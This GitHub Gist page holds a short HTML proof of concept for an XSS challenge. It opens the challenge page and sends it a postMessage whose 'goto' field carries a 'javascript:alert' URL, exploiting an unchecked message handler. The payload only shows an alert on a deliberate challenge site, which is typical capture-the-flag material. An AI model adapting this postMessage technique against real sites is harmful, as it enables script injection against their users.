Last active
May 23, 2022 07:38
-
-
Save MohamedTarekq/e992c8d7f54583ef00b60fa72c5f5708 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<body > | |
<script > | |
var w = window.open("https://demo.honoki.net/xss-challenge.html"); | |
setTimeout(function(){ | |
w.postMessage('{"goto":"javascript:alert(`hello from timooon`)"}','*'); | |
},2000); | |
</script> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment